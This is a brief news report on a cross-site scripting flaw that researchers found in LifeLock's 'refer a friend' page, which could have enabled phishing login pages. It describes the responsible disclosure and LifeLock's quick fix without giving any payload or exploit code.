Researchers identified a cross-site scripting vulnerability in a page on the LifeLock website that could allow an attacker to create an authentic-looking login page for the service and harvest usernames and passwords from customers.
LifeLock patched the vulnerability quickly after researchers Blake Welsh and Eric Taylor from Cinder Cyber Research reported it. Welsh said via email that the pair stumbled across the vulnerability while browsing the site.
“We were just browsing around Lifelock’s website when we came across a page called refer a friend and we noticed one of the URL parameters was producing a colored text, so we decided to see what would happen if we injected HTML into the URL parameter and it played out as an XSS attack that could be used in phishing campaigns,” Welsh said.
[youtube https://www.youtube.com/watch?v=qtkAecBw1Rs?rel=0&w=560&h=315]
LifeLock is among the larger identity theft protection companies in the world and says it provides services to more than three million customers. The XSS bug that Welsh and Taylor discovered could have been used in any of a number of different phishing campaigns, either through email lures or redirects from other sites. The page that the researchers created looked enough like an authentic login screen that it likely would’ve been enough to ensnare some victims.
Welsh said that LifeLock officials took their report quite seriously and got on it immediately.
“The response time of Lifelock was very fast, they fixed the XSS in a matter of minutes and were very cooperative,” he said.